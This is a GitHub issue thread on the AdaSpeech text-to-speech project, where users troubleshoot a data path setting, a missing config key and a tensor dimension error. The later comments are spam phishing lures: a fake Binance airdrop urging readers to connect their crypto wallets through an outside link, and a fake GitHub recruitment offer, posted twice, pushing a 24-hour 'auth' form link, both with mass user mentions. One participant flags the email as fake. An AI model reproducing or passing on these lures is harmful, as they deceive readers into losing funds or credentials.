### ISSUE TITLE
yaml 

### ISSUE THREAD

**Issue by yanzhuangzhuang-beep** [rishikksh20/AdaSpeech#9]
in yaml "data_dir: 'H:\Deepsync\backup\fastspeech\data\'" how to find the data

**Comment by yiwei0730** [comment]
you need to download the data in network by yourself, and direct the data_dir to your own data dir

**Comment by yanzhuangzhuang-beep** [comment]
I have data LJSpeech-1.1 but it's wavs  data .so it's path wav_dir.
You said  I need dowoload data which I don't have the href.
could you provide the  url ，thanks

**Comment by yiwei0730** [comment]
yes the data LJSpeech-1.1 and you just run the nvidia_preprocessing and write the data_dir to your data directory then its work

**Comment by yanzhuangzhuang-beep** [comment]
ok I have finish nvidia_preprocessing.
when i run train_fastspeech  have a error no key "hp.model.phoneme_acoustic_embed"
I find that in config.yaml no key model..phoneme_acoustic_embed and the value

**Comment by yanzhuangzhuang-beep** [comment]
In yaml, I set model.phoneme_acoustic_embed =True
then,self.utterance_encoder(ys.transpose(1, 2)).transpose(1, 2) error
ndexError: Dimension out of range (expected to be in range of [-1, 0], but got 1)

**Comment by yiwei0730** [comment]
self.utterance_encoder(ys.transpose(1, 2)).transpose(1, 2) error
This answer is in the other issue, you can find it in fastspeech.py line 314 have misss the third param ys.
There have still some bugs in this program, hope you can find and fix it.

**Comment by alidabaghi123** [comment]
i have same problem. can you help me???

**Comment by Pawanpatidar99** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @LeeJaeWonLJW, @marvinbrinkmann, @joshdunnlime, @Yuanye, @johndonaldlloyd, @sarthakkaushik, @BladeRunner713

**Comment by rarents1975** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
leehanchung, @akansal1, @Pairshoe, @Khreas, @trevorhlynnRF, @hkirat, @wZHENG111, @OKUA1, @johnjjung, @wangjiejacques, @Fordacre, @JasonDing0401, @Frankyu379, @git-ced, @rishikarohila12, @DSTTSD, @proger, @kirillsaidov, @gauss5930, @sweetcard

**Comment by DSTTSD** [comment]
您好，我已经收到您的邮件，我会马上查看并回复，谢谢！

**Comment by rarents1975** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
pm3310, @amitmeel, @noahgift, @MAlGIaT, @SulRash, @lx-mitin, @VanshGehlot, @scy9559, @BigRabbit71, @pascal-pfeiffer, @sombochea, @empowerVictor, @michadel, @soichiro0210, @Utsav7428, @lqu, @shyamperi, @hemangjoshi37a, @frytaz, @shiquan-wang

**Comment by yiwei0730** [comment]
@DSTTSD bro this is a fake email don't click the button...
